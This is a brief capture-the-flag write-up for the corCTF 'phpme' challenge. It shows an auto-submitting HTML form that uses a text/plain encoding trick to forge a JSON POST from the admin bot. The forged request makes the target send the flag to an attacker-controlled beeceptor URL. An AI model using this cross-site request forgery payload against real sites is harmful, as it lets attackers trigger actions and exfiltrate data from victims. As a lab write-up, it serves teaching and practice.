Tags: corctf json post 

Rating: 4.0

The Admin bot will visit your page which will automatically POST to the required JSON to phpme.be.ax through HTML form.
In return it will send the flag to URL provided.

```
<body onload="document.forms[0].submit()">
<form method='POST' enctype='text/plain' action="https://phpme.be.ax/">
<input name='{ "yep": "yep yep yep", "url": "https://XXXXX.free.beeceptor.com", "=":" ' value='"}'>
<input type="Submit">
</form>
</body>
```